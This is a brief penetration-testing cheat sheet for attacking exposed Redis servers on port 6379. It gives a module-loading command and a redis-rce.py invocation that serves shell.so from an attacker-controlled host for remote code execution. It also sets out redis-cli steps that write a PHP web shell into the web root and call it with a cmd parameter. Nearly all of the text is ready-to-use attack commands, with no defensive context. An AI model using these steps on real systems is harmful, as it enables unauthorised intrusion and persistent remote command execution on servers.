Port 6379 - Redis

• Redcli

LOAD MODULE /var/ftp/pub/module.so

https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

• RedisRCE

redisrce.py -r 10.10.10.10 -p 6379 -L 10.10.10.20 -P 6379 -f shell.so

GitHub - Ridter/redis-rce: Redis 4.x/5.x RCEGitHub

• WebShell

  • Prereqs: Known absolute path to web root

  • Access to redis cli

config set dir /var/www/html
config set dbfilename sys.php
set test “<?php system($_REQUEST['cmd']); ?>”
save

Navigate to the page to execute:

$IP/sys.php?cmd=id